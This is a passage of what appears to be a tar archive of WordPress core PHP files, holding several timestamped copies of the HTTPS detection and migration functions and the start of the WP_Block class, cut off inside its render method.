* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260614061720.php 0000666 00000011205 15224151221 0011766 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605225728-20260621081120.php 0000666 00000011205 15224151221 0013354 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260606074445.php 0000666 00000011205 15224151221 0011777 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605201901-20260621081100.php 0000666 00000013341 15224151221 0013325 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-block.php 0000666 00000060354 15224151221 0010105 0 ustar 00 <?php
/**
* Blocks API: WP_Block class
*
* @package WordPress
* @since 5.5.0
*/
/**
* Class representing a parsed instance of a block.
*
* @since 5.5.0
* @property array $attributes
*/
#[AllowDynamicProperties]
class WP_Block {
/**
* Original parsed array representation of block.
*
* @since 5.5.0
* @var array
*/
public $parsed_block;
/**
* Name of block.
*
* @example "core/paragraph"
*
* @since 5.5.0
* @var string|null
*/
public $name;
/**
* Block type associated with the instance.
*
* @since 5.5.0
* @var WP_Block_Type
*/
public $block_type;
/**
* Block context values.
*
* @since 5.5.0
* @var array
*/
public $context = array();
/**
* All available context of the current hierarchy.
*
* @since 5.5.0
* @var array
*/
protected $available_context = array();
/**
* Block type registry.
*
* @since 5.9.0
* @var WP_Block_Type_Registry
*/
protected $registry;
/**
* List of inner blocks (of this same class)
*
* @since 5.5.0
* @var WP_Block_List
*/
public $inner_blocks = array();
/**
* Resultant HTML from inside block comment delimiters after removing inner
* blocks.
*
* @example "...Just <!-- wp:test /--> testing..." -> "Just testing..."
*
* @since 5.5.0
* @var string
*/
public $inner_html = '';
/**
* List of string fragments and null markers where inner blocks were found
*
* @example array(
* 'inner_html' => 'BeforeInnerAfter',
* 'inner_blocks' => array( block, block ),
* 'inner_content' => array( 'Before', null, 'Inner', null, 'After' ),
* )
*
* @since 5.5.0
* @var array
*/
public $inner_content = array();
/**
* Constructor.
*
* Populates object properties from the provided block instance argument.
*
* The given array of context values will not necessarily be available on
* the instance itself, but is treated as the full set of values provided by
* the block's ancestry. This is assigned to the private `available_context`
* property. Only values which are configured to consumed by the block via
* its registered type will be assigned to the block's `context` property.
*
* @since 5.5.0
*
* @param array $block {
* An associative array of a single parsed block object. See WP_Block_Parser_Block.
*
* @type string|null $blockName Name of block.
* @type array $attrs Attributes from block comment delimiters.
* @type array $innerBlocks List of inner blocks. An array of arrays that
* have the same structure as this one.
* @type string $innerHTML HTML from inside block comment delimiters.
* @type array $innerContent List of string fragments and null markers where inner blocks were found.
* }
* @param array $available_context Optional array of ancestry context values.
* @param WP_Block_Type_Registry $registry Optional block type registry.
*/
public function __construct( $block, $available_context = array(), $registry = null ) {
$this->parsed_block = $block;
$this->name = $block['blockName'];
if ( is_null( $registry ) ) {
$registry = WP_Block_Type_Registry::get_instance();
}
$this->registry = $registry;
$this->block_type = $registry->get_registered( $this->name );
$this->available_context = $available_context;
$this->refresh_context_dependents();
}
/**
* Updates the context for the current block and its inner blocks.
*
* The method updates the context of inner blocks, if any, by passing down
* any context values the block provides (`provides_context`).
*
* If the block has inner blocks, the method recursively processes them by creating new instances of `WP_Block`
* for each inner block and updating their context based on the block's `provides_context` property.
*
* @since 6.8.0
*/
public function refresh_context_dependents() {
/*
* Merging the `$context` property here is not ideal, but for now needs to happen because of backward compatibility.
* Ideally, the `$context` property itself would not be filterable directly and only the `$available_context` would be filterable.
* However, this needs to be separately explored whether it's possible without breakage.
*/
$this->available_context = array_merge( $this->available_context, $this->context );
if ( ! empty( $this->block_type->uses_context ) ) {
foreach ( $this->block_type->uses_context as $context_name ) {
if ( array_key_exists( $context_name, $this->available_context ) ) {
$this->context[ $context_name ] = $this->available_context[ $context_name ];
}
}
}
$this->refresh_parsed_block_dependents();
}
/**
* Updates the parsed block content for the current block and its inner blocks.
*
* This method sets the `inner_html` and `inner_content` properties of the block based on the parsed
* block content provided during initialization. It ensures that the block instance reflects the
* most up-to-date content for both the inner HTML and any string fragments around inner blocks.
*
* If the block has inner blocks, this method initializes a new `WP_Block_List` for them, ensuring the
* correct content and context are updated for each nested block.
*
* @since 6.8.0
*/
public function refresh_parsed_block_dependents() {
if ( ! empty( $this->parsed_block['innerBlocks'] ) ) {
$child_context = $this->available_context;
if ( ! empty( $this->block_type->provides_context ) ) {
foreach ( $this->block_type->provides_context as $context_name => $attribute_name ) {
if ( array_key_exists( $attribute_name, $this->attributes ) ) {
$child_context[ $context_name ] = $this->attributes[ $attribute_name ];
}
}
}
$this->inner_blocks = new WP_Block_List( $this->parsed_block['innerBlocks'], $child_context, $this->registry );
}
if ( ! empty( $this->parsed_block['innerHTML'] ) ) {
$this->inner_html = $this->parsed_block['innerHTML'];
}
if ( ! empty( $this->parsed_block['innerContent'] ) ) {
$this->inner_content = $this->parsed_block['innerContent'];
}
}
/**
* Returns a value from an inaccessible property.
*
* This is used to lazily initialize the `attributes` property of a block,
* such that it is only prepared with default attributes at the time that
* the property is accessed. For all other inaccessible properties, a `null`
* value is returned.
*
* @since 5.5.0
*
* @param string $name Property name.
* @return array|null Prepared attributes, or null.
*/
public function __get( $name ) {
if ( 'attributes' === $name ) {
$this->attributes = isset( $this->parsed_block['attrs'] ) ?
$this->parsed_block['attrs'] :
array();
if ( ! is_null( $this->block_type ) ) {
$this->attributes = $this->block_type->prepare_attributes_for_render( $this->attributes );
}
return $this->attributes;
}
return null;
}
/**
* Processes the block bindings and updates the block attributes with the values from the sources.
*
* A block might contain bindings in its attributes. Bindings are mappings
* between an attribute of the block and a source. A "source" is a function
* registered with `register_block_bindings_source()` that defines how to
* retrieve a value from outside the block, e.g. from post meta.
*
* This function will process those bindings and update the block's attributes
* with the values coming from the bindings.
*
* ### Example
*
* The "bindings" property for an Image block might look like this:
*
* ```json
* {
* "metadata": {
* "bindings": {
* "title": {
* "source": "core/post-meta",
* "args": { "key": "text_custom_field" }
* },
* "url": {
* "source": "core/post-meta",
* "args": { "key": "url_custom_field" }
* }
* }
* }
* }
* ```
*
* The above example will replace the `title` and `url` attributes of the Image
* block with the values of the `text_custom_field` and `url_custom_field` post meta.
*
* @since 6.5.0
* @since 6.6.0 Handle the `__default` attribute for pattern overrides.
* @since 6.7.0 Return any updated bindings metadata in the computed attributes.
*
* @return array The computed block attributes for the provided block bindings.
*/
private function process_block_bindings() {
$block_type = $this->name;
$parsed_block = $this->parsed_block;
$computed_attributes = array();
$supported_block_attributes = get_block_bindings_supported_attributes( $block_type );
// If the block doesn't have the bindings property, isn't one of the supported
// block types, or the bindings property is not an array, return the block content.
if (
empty( $supported_block_attributes ) ||
empty( $parsed_block['attrs']['metadata']['bindings'] ) ||
! is_array( $parsed_block['attrs']['metadata']['bindings'] )
) {
return $computed_attributes;
}
$bindings = $parsed_block['attrs']['metadata']['bindings'];
/*
* If the default binding is set for pattern overrides, replace it
* with a pattern override binding for all supported attributes.
*/
if (
isset( $bindings['__default']['source'] ) &&
'core/pattern-overrides' === $bindings['__default']['source']
) {
$updated_bindings = array();
/*
* Build a binding array of all supported attributes.
* Note that this also omits the `__default` attribute from the
* resulting array.
*/
foreach ( $supported_block_attributes as $attribute_name ) {
// Retain any non-pattern override bindings that might be present.
$updated_bindings[ $attribute_name ] = isset( $bindings[ $attribute_name ] )
? $bindings[ $attribute_name ]
: array( 'source' => 'core/pattern-overrides' );
}
$bindings = $updated_bindings;
/*
* Update the bindings metadata of the computed attributes.
* This ensures the block receives the expanded __default binding metadata when it renders.
*/
$computed_attributes['metadata'] = array_merge(
$parsed_block['attrs']['metadata'],
array( 'bindings' => $bindings )
);
}
foreach ( $bindings as $attribute_name => $block_binding ) {
// If the attribute is not in the supported list, process next attribute.
if ( ! in_array( $attribute_name, $supported_block_attributes, true ) ) {
continue;
}
// If no source is provided, or that source is not registered, process next attribute.
if ( ! isset( $block_binding['source'] ) || ! is_string( $block_binding['source'] ) ) {
continue;
}
$block_binding_source = get_block_bindings_source( $block_binding['source'] );
if ( null === $block_binding_source ) {
continue;
}
// Adds the necessary context defined by the source.
if ( ! empty( $block_binding_source->uses_context ) ) {
foreach ( $block_binding_source->uses_context as $context_name ) {
if ( array_key_exists( $context_name, $this->available_context ) ) {
$this->context[ $context_name ] = $this->available_context[ $context_name ];
}
}
}
$source_args = ! empty( $block_binding['args'] ) && is_array( $block_binding['args'] ) ? $block_binding['args'] : array();
$source_value = $block_binding_source->get_value( $source_args, $this, $attribute_name );
// If the value is not null, process the HTML based on the block and the attribute.
if ( ! is_null( $source_value ) ) {
$computed_attributes[ $attribute_name ] = $source_value;
}
}
return $computed_attributes;
}
/**
* Depending on the block attribute name, replace its value in the HTML based on the value provided.
*
* @since 6.5.0
*
* @param string $block_content Block content.
* @param string $attribute_name The attribute name to replace.
* @param mixed $source_value The value used to replace in the HTML.
* @return string The modified block content.
*/
private function replace_html( string $block_content, string $attribute_name, $source_value ) {
$block_type = $this->block_type;
if ( ! isset( $block_type->attributes[ $attribute_name ]['source'] ) ) {
return $block_content;
}
// Depending on the attribute source, the processing will be different.
switch ( $block_type->attributes[ $attribute_name ]['source'] ) {
case 'html':
case 'rich-text':
$block_reader = self::get_block_bindings_processor( $block_content );
// TODO: Support for CSS selectors whenever they are ready in the HTML API.
// In the meantime, support comma-separated selectors by exploding them into an array.
$selectors = explode( ',', $block_type->attributes[ $attribute_name ]['selector'] );
// Add a bookmark to the first tag to be able to iterate over the selectors.
$block_reader->next_tag();
$block_reader->set_bookmark( 'iterate-selectors' );
foreach ( $selectors as $selector ) {
// If the parent tag, or any of its children, matches the selector, replace the HTML.
if ( strcasecmp( $block_reader->get_tag(), $selector ) === 0 || $block_reader->next_tag(
array(
'tag_name' => $selector,
)
) ) {
// TODO: Use `WP_HTML_Processor::set_inner_html` method once it's available.
$block_reader->release_bookmark( 'iterate-selectors' );
$block_reader->replace_rich_text( wp_kses_post( $source_value ) );
return $block_reader->get_updated_html();
} else {
$block_reader->seek( 'iterate-selectors' );
}
}
$block_reader->release_bookmark( 'iterate-selectors' );
return $block_content;
case 'attribute':
$amended_content = new WP_HTML_Tag_Processor( $block_content );
if ( ! $amended_content->next_tag(
array(
// TODO: build the query from CSS selector.
'tag_name' => $block_type->attributes[ $attribute_name ]['selector'],
)
) ) {
return $block_content;
}
$amended_content->set_attribute( $block_type->attributes[ $attribute_name ]['attribute'], $source_value );
return $amended_content->get_updated_html();
default:
return $block_content;
}
}
private static function get_block_bindings_processor( string $block_content ) {
$internal_processor_class = new class('', WP_HTML_Processor::CONSTRUCTOR_UNLOCK_CODE) extends WP_HTML_Processor {
/**
* Replace the rich text content between a tag opener and matching closer.
*
* When stopped on a tag opener, replace the content enclosed by it and its
* matching closer with the provided rich text.
*
* @param string $rich_text The rich text to replace the original content with.
* @return bool True on success.
*/
public function replace_rich_text( $rich_text ) {
if ( $this->is_tag_closer() || ! $this->expects_closer() ) {
return false;
}
$depth = $this->get_current_depth();
$tag_name = $this->get_tag();
$this->set_bookmark( '_wp_block_bindings' );
// The bookmark names are prefixed with `_` so the key below has an extra `_`.
$tag_opener = $this->bookmarks['__wp_block_bindings'];
$start = $tag_opener->start + $tag_opener->length;
// Find matching tag closer.
while ( $this->next_token() && $this->get_current_depth() >= $depth ) {
}
if ( ! $this->is_tag_closer() || $tag_name !== $this->get_tag() ) {
return false;
}
$this->set_bookmark( '_wp_block_bindings' );
$tag_closer = $this->bookmarks['__wp_block_bindings'];
$end = $tag_closer->start;
$this->lexical_updates[] = new WP_HTML_Text_Replacement(
$start,
$end - $start,
$rich_text
);
return true;
}
};
return $internal_processor_class::create_fragment( $block_content );
}
/**
* Generates the render output for the block.
*
* @since 5.5.0
* @since 6.5.0 Added block bindings processing.
*
* @global WP_Post $post Global post object.
*
* @param array $options {
* Optional options object.
*
* @type bool $dynamic Defaults to 'true'. Optionally set to false to avoid using the block's render_callback.
* }
* @return string Rendered block output.
*/
public function render( $options = array() ) {
global $post;
$before_wp_enqueue_scripts_count = did_action( 'wp_enqueue_scripts' );
// Capture the current assets queues.
$before_styles_queue = wp_styles()->queue;
$before_scripts_queue = wp_scripts()->queue;
$before_script_modules_queue = wp_script_modules()->get_queue();
/*
* There can be only one root interactive block at a time because the rendered HTML of that block contains
* the rendered HTML of all its inner blocks, including any interactive block.
*/
static $root_interactive_block = null;
/**
* Filters whether Interactivity API should process directives.
*
* @since 6.6.0
*
* @param bool $enabled Whether the directives processing is enabled.
*/
$interactivity_process_directives_enabled = apply_filters( 'interactivity_process_directives', true );
if (
$interactivity_process_directives_enabled && null === $root_interactive_block && (
( isset( $this->block_type->supports['interactivity'] ) && true === $this->block_type->supports['interactivity'] ) ||
! empty( $this->block_type->supports['interactivity']['interactive'] )
)
) {
$root_interactive_block = $this;
}
$options = wp_parse_args(
$options,
array(
'dynamic' => true,
)
);
// Process the block bindings and get attributes updated with the values from the sources.
$computed_attributes = $this->process_block_bindings();
if ( ! empty( $computed_attributes ) ) {
// Merge the computed attributes with the original attributes.
$this->attributes = array_merge( $this->attributes, $computed_attributes );
}
$is_dynamic = $options['dynamic'] && $this->name && null !== $this->block_type && $this->block_type->is_dynamic();
$block_content = '';
if ( ! $options['dynamic'] || empty( $this->block_type->skip_inner_blocks ) ) {
$index = 0;
foreach ( $this->inner_content as $chunk ) {
if ( is_string( $chunk ) ) {
$block_content .= $chunk;
} else {
$inner_block = $this->inner_blocks[ $index ];
$parent_block = $this;
/** This filter is documented in wp-includes/blocks.php */
